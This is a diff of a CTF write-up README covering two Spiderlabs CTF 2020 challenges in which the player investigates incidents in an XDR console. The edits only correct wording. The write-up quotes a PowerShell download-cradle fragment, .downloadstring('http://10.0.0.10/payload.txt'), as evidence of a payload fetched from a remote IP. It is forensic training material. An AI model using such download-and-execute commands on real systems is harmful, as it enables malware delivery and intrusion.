fantafour-haojun/fantafour-haojun.github.io/CTF_Writeup/Spiderlabs_CTF_2020/README.md

 ### Address Unknown
 In an Incident involving the host "PeckPC", a payload is downloaded form a malicious IP address.
 What other host(s) have been communicating with the IP address in question?

-There are a few hosts being flagged under the incident and I just tried `SpenglerPC` which turns out to the answer.
+There are a few hosts being flagged under the incident and I just tried `SpenglerPC` which turns out to be the answer.

 ### Remote Control
 When analyzing a security event, XDR surfaces information of interest in each node of the causality flow chart.
 In the incident labeled 'Process requests the deletion of Windows Shadowcopies', an initial payload is downloaded from a remote IP address to "PeckPC'. what is the IP address?

 <img src="https://user-images.githubusercontent.com/54532620/89723295-e8594b80-da26-11ea-9429-2d67891768eb.png">

-Click on the powershell.exe with .downloadstring('http://10.0.0.10/payload.txt ')), then network and you will find the dest IP is `10.0.0.10`
+Click on the powershell.exe with .downloadstring('http://10.0.0.10/payload.txt ')), then click network and you will find the dest IP is `10.0.0.10`

 <img src="https://user-images.githubusercontent.com/54532620/89723309-01fa9300-da27-11ea-8399-1f7e8814d31f.png">